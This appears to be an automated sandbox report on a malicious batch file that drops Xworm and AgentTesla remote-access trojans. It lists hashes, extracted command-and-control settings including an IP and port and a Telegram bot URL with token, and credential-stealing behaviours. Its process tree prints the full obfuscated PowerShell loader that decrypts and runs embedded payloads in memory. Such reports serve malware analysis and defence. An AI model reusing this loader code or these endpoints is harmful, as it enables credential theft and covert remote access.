Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
24-05-2024 17:46
General
-
Target
m16XClientn.bat
-
Size
60KB
-
MD5
322ea0b2359b53869e96a92ce89f0d9e
-
SHA1
c175334e858e2e6761202e7546201b26faefb911
-
SHA256
9eb06cfb9cd881338d93b6e2cad6e6a4bd823c44d0128a047e85fa14f278e76c
-
SHA512
080bb6189372bf55e533923a8f7cad393ecaccccff23ce578efe7104cc76779320faa43aa6b27fc43e63e0ea15f246ff38fccc91b5ebe6c5d4476daabde38c8f
-
SSDEEP
1536:qHRDZwBvoIeYCOoeK9PlcXmmHaoifEJ0SzAw:qHRDZwRN0cXGcJ0xw
Malware Config
Extracted
xworm
3.1
134.255.233.93:7000
OXTS79ak3lwQUaDQ
-
install_file
USB.exe
Extracted
agenttesla
https://api.telegram.org/bot6840755276:AAHEhHpmlrUuXaIUnKpuniBmO-DaNx3tnLo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B9b88R1T4CVo1WoTI+/W1BysqGk+qehh5RByOsn7XiU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lcCPo+xF8g8/Cxxizm+V4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rkxQO=New-Object System.IO.MemoryStream(,$param_var); $FvJOV=New-Object System.IO.MemoryStream; $OPzQw=New-Object System.IO.Compression.GZipStream($rkxQO, [IO.Compression.CompressionMode]::Decompress); $OPzQw.CopyTo($FvJOV); $OPzQw.Dispose(); $rkxQO.Dispose(); $FvJOV.Dispose(); $FvJOV.ToArray();}function execute_function($param_var,$param2_var){ $dLJDy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rrYOP=$dLJDy.EntryPoint; $rrYOP.Invoke($null, $param2_var);}$MGRmn = 'C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat';$host.UI.RawUI.WindowTitle = $MGRmn;$RZrKP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MGRmn).Split([Environment]::NewLine);foreach ($kOWJS in $RZrKP) { if ($kOWJS.StartsWith('vGMencdustGzyGaJrmyt')) { $UphAS=$kOWJS.Substring(20); break; }}$payloads_var=[string[]]$UphAS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\yzrfhd.exe"C:\Users\Admin\AppData\Local\Temp\yzrfhd.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0yliotz.xwp.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpC238.tmpFilesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
C:\Users\Admin\AppData\Local\Temp\yzrfhd.exeFilesize
248KB
MD583acde7f5c4c56adcc04160a847f6f63
SHA10128a01cb01733e424a8a84ce857708f7f63aa98
SHA25600fec1113446569400004dd1e4def56c4be3ddc15e63cc498a74e6d936dba925
SHA51237fa7843e2848a85821ab64eff5277a207e5c883074e2702acc32c02c6acdf41a9bfbb5fe7dfeaa9609645d73c3b7f40cb00a5d6c9f52c36cdf0ca65ee3480fe
-
memory/1340-17-0x00007FFF15930000-0x00007FFF159EE000-memory.dmpFilesize
760KB
-
memory/1340-13-0x0000024D516D0000-0x0000024D51714000-memory.dmpFilesize
272KB
-
memory/1340-8-0x0000024D511A0000-0x0000024D511C2000-memory.dmpFilesize
136KB
-
memory/1340-14-0x0000024D51720000-0x0000024D51796000-memory.dmpFilesize
472KB
-
memory/1340-15-0x0000024D39010000-0x0000024D39020000-memory.dmpFilesize
64KB
-
memory/1340-0-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmpFilesize
8KB
-
memory/1340-16-0x00007FFF16C50000-0x00007FFF16E45000-memory.dmpFilesize
2.0MB
-
memory/1340-18-0x0000024D51080000-0x0000024D5108C000-memory.dmpFilesize
48KB
-
memory/1340-19-0x0000024D51450000-0x0000024D5145E000-memory.dmpFilesize
56KB
-
memory/1340-20-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-22-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-23-0x00007FFEF8BF3000-0x00007FFEF8BF5000-memory.dmpFilesize
8KB
-
memory/1340-24-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-11-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-44-0x0000024D53100000-0x0000024D53628000-memory.dmpFilesize
5.2MB
-
memory/1340-12-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/1340-43-0x0000024D52A00000-0x0000024D52BC2000-memory.dmpFilesize
1.8MB
-
memory/1340-42-0x0000024D527B0000-0x0000024D52832000-memory.dmpFilesize
520KB
-
memory/1340-40-0x00007FFEF8BF0000-0x00007FFEF96B1000-memory.dmpFilesize
10.8MB
-
memory/4064-41-0x0000000074FC0000-0x0000000075770000-memory.dmpFilesize
7.7MB
-
memory/4064-39-0x0000000005190000-0x00000000051F6000-memory.dmpFilesize
408KB
-
memory/4064-38-0x00000000057C0000-0x0000000005D64000-memory.dmpFilesize
5.6MB
-
memory/4064-62-0x0000000074FC0000-0x0000000075770000-memory.dmpFilesize
7.7MB
-
memory/4064-37-0x0000000000770000-0x00000000007B4000-memory.dmpFilesize
272KB
-
memory/4064-57-0x00000000069F0000-0x0000000006A40000-memory.dmpFilesize
320KB
-
memory/4064-58-0x0000000006AE0000-0x0000000006B7C000-memory.dmpFilesize
624KB
-
memory/4064-59-0x0000000006B80000-0x0000000006C12000-memory.dmpFilesize
584KB
-
memory/4064-60-0x0000000006AA0000-0x0000000006AAA000-memory.dmpFilesize
40KB
-
memory/4064-61-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB
-
memory/4064-36-0x0000000074FCE000-0x0000000074FCF000-memory.dmpFilesize
4KB